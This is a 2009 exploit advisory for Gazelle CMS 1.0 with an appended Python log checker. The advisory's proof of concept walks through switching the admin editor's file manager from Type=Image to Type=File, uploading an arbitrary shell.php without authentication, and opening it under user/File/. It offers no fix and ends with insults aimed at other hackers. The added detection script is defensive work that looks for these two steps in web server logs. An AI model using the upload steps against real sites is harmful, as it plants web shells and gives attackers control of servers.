Gazelle CMS 1.0 Remote Arbitrary Shell Upload Vulnerability

2009.09.15
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

====================================================
| Gazelle CMS 1.0 Remote Arbitrary File Upload Vuln
| My Home Page : WwW.Sec-Code.CoM
| Founded By RoMaNcYxHaCkEr
====================================================
[!] Discovered.: RoMaNcYxHaCkEr
[!] Vendor.....: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
[!] My Homepage...: WwW.Sec-Code.CoM
[!] Security - Codes Group ...: aB0-3tH4b T3rR0r , mr-al7rbi , sniper-code
[!] Contact Me ...: rXh@Mail.Net.Sa
[!] PoC........:
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Image
^^^^ This Is Default In Editor admin
Try Change Image To File Like This :
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=File
Upload Any Shell.php Then You See That's Here E.G. :
http://localhost/Ananta_Gazelle1.0/user/File/shell.php
[!] Solution...: I Don't Know He He :D , Contact With Me ;)
[!] Greetingz..: All My Forum Members , My TeaM , Dexter Franklin ;)
[!] Thx .. : IHTTeam For His Exploit
[!] Fuck To .. : Third , Dev1l-Fucker <<< They Big Big Big Big Lamerz
[!] rXh
[!] bEST wISHES
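
Added example (not part of the original advisory and not Gazelle CMS code): a log check a site operator can run to see whether the file manager was opened with a non-default Type and whether a script under user/File/ was then served to the same client. It assumes Apache Combined Log Format; the extension list is an assumption, and the sample log lines are constructed from the URLs above using documentation IP addresses.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Combined Log Format (assumed): client, timestamp, method, target, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
FILEMANAGER = "/admin/editor/filemanager/"  # path taken from the advisory
UPLOAD_TREE = "/user/file/"                 # upload location from the advisory
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")  # assumed


def classify(target):
    """Return 'connector', 'script' or None for one request target."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if FILEMANAGER in path:
        query = {k.lower(): [v.lower() for v in vs]
                 for k, vs in parse_qs(parts.query).items()}
        # The editor's default is Type=Image; any other value is flagged.
        if query.get("type", ["image"]) != ["image"]:
            return "connector"
    if UPLOAD_TREE in path and path.endswith(SCRIPT_EXT):
        return "script"
    return None


def find_upload_abuse(lines):
    """Per client: flagged requests, and whether both stages were seen."""
    seen = defaultdict(lambda: {"connector": [], "script": []})
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            client, when, method, target, status = m.groups()
            kind = classify(target)
            if kind:
                seen[client][kind].append((when, method, target, int(status)))
    for hits in seen.values():
        # Correlated: non-default Type used AND a script was served (HTTP 200).
        served = any(h[3] == 200 for h in hits["script"])
        hits["correlated"] = bool(hits["connector"]) and served
    return dict(seen)


BASE = "/Ananta_Gazelle1.0"  # install path used in the advisory's URLs
FM = BASE + "/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type="
SAMPLE_LOG = [  # constructed log lines, not real traffic
    '198.51.100.7 - - [15/Sep/2009:10:01:02 +0000] "GET ' + FM + 'File HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Sep/2009:10:01:40 +0000] "GET ' + BASE + '/user/File/shell.php HTTP/1.1" 200 312',
    '203.0.113.9 - - [15/Sep/2009:10:05:00 +0000] "GET ' + FM + 'Image HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Sep/2009:10:05:30 +0000] "GET ' + BASE + '/user/File/report.pdf HTTP/1.1" 200 90211',
]
```

Any client reported with "correlated" set deserves a review of the files in the upload directory; serving that directory without PHP execution removes the second stage regardless of what gets uploaded.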

References:

http://www.milw0rm.com/exploits/9433
http://secunia.com/advisories/33686

